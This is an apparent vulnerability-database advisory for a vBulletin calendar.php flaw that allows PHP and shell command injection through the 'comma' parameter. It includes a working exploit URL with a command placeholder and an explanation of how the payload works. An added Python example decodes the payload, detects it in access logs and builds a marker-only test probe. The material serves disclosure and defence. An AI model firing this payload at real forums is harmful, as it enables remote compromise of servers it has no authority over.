vBulletin calendar.php comma Parameter Arbitrary Command Execution

2002-09-24T00:00:00
ID OSVDB:3299
Type osvdb
Reporter gosper(gosper@nix.org)
Modified 2002-09-24T00:00:00

Description

Vulnerability Description

vBulletin contains a flaw that may allow a remote attacker to execute arbitrary commands. The 'calendar.php' script inserts the user-supplied 'comma' request parameter into PHP code without sanitizing it, so a value that closes the surrounding double-quoted string and appends its own PHP statements is executed by the server. The published test string does exactly that and uses PHP's backtick operator to run an arbitrary shell command with the privileges of the web server process. A remote attacker can therefore execute arbitrary PHP code and operating system commands, resulting in a loss of integrity (and, in practice, of confidentiality and availability of the host as well).

Solution Description

Upgrade to version 2.2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

vBulletin's 'calendar.php' script does not sanitize the 'comma' request parameter before it is evaluated as PHP, allowing a remote attacker to inject PHP statements and execute arbitrary commands on the server.

Manual Testing Notes

http://[victim]/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

Percent-decoded, the 'comma' value is  ";echo ''; echo `<command> `;die();echo"  : the leading double quote terminates the string the parameter is embedded in, the injected statements run the command in backticks and print its output, die() stops the script so the output is returned unmixed with the rest of the page, and the trailing echo" re-opens a string so the surrounding PHP stays syntactically valid. Replace <command> with a harmless command such as id when confirming the issue; the command runs as the web server user.
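The following is an added example, not code from the advisory or from vBulletin. It decodes the manual-testing URL above to show the injected PHP, scans web server access logs for requests that carry the same injection shape in the 'comma' parameter of calendar.php, and builds a marker-only variant of the probe that prints a token instead of running a shell command. The hostname forum.example.com and the log lines are constructed for the example.

```python
"""Added example for the vBulletin calendar.php 'comma' issue (OSVDB 3299).
Not vBulletin code; the log lines and hostname below are constructed."""
import re
from urllib.parse import unquote_plus, quote

# The probe URL from the advisory, <command> left as the placeholder.
ADVISORY_URL = ("http://[victim]/calendar.php?calbirthdays=1&action=getday"
                "&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22")

# Characters that have no business in a 'comma' value, which is a list separator.
PHP_INJECTION_MARKERS = ('"', "'", ";", "`", "(", ")", "$", "<?")

# Apache/NCSA combined log format, enough of it to pull the request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log: one normal calendar request, one injection, one unrelated hit.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2002:10:15:32 +0000] "GET /calendar.php?calbirthdays=1&action=getday&day=2002-9-24&comma=%2C%20 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.77 - - [24/Sep/2002:10:16:01 +0000] "GET /calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 200 83 "-" "Mozilla/4.0"
192.0.2.77 - - [24/Sep/2002:10:16:05 +0000] "GET /forumdisplay.php?forumid=3 HTTP/1.0" 200 9000 "-" "Mozilla/4.0"
"""


def query_params(url_or_path):
    """Split the query string on '&' only and percent-decode each value.
    Done by hand rather than with parse_qs because older Pythons also split
    on ';', and the ';' inside this payload must survive decoding."""
    _, _, qs = url_or_path.partition("?")
    params = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_comma(value):
    """Return the reasons a decoded 'comma' value looks like PHP injection.
    An empty list means it is only commas and spaces, i.e. a plain separator."""
    if value is None:
        return []
    reasons = []
    if not re.fullmatch(r"[ ,]*", value):
        reasons.append("not a plain separator")
    found = [m for m in PHP_INJECTION_MARKERS if m in value]
    if found:
        reasons.append("injection markers: " + " ".join(found))
    if re.search(r'"\s*;', value):
        reasons.append("closes a double-quoted string and starts a statement")
    return reasons


def scan_log(lines):
    """Return (client ip, decoded comma value, reasons) for every calendar.php
    request whose 'comma' parameter looks like injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if not target.partition("?")[0].endswith("/calendar.php"):
            continue
        value = query_params(target).get("comma")
        reasons = classify_comma(value)
        if reasons:
            hits.append((m.group("ip"), value, reasons))
    return hits


def build_marker_probe(base_url, token):
    """Build the advisory's request with a harmless PHP marker in place of the
    backtick command: no OS command runs, the page just prints token and stops.
    base_url is assumed to look like 'http://forum.example.com' (assumption)."""
    payload = '";echo \'%s\';die();echo "' % token
    return (base_url.rstrip("/") + "/calendar.php?calbirthdays=1&action=getday"
            "&day=2001-8-15&comma=" + quote(payload, safe=""))


def marker_echoed(response_body, token):
    """True if the marker came back; use a random token so a normal page
    cannot contain it by accident."""
    return token in response_body


if __name__ == "__main__":
    print("advisory payload decodes to:", query_params(ADVISORY_URL)["comma"])
    for ip, value, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, repr(value), "; ".join(reasons))
    print(build_marker_probe("http://forum.example.com", "zq7k2"))
```

The log scanner keys on the shape of the value rather than on a fixed string, so a variant that swaps die() for exit() or uses a different command is still caught: a legitimate 'comma' is only ever a separator, so anything containing quotes, semicolons, backticks or parentheses is worth an alert. The marker probe is the safe way to confirm the flaw on a host you are authorised to test; if the token comes back in the body, the injected PHP ran and the backtick form from the advisory would run a shell command.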

References:

Vendor URL: http://www.vbulletin.com/
Other Advisory URL: http://www.securiteam.com/exploits/5QP0P158AC.html
ISS X-Force ID: 10176
CVE: CVE-2002-1660
CVE: CVE-2002-2157
Bugtraq ID: 5820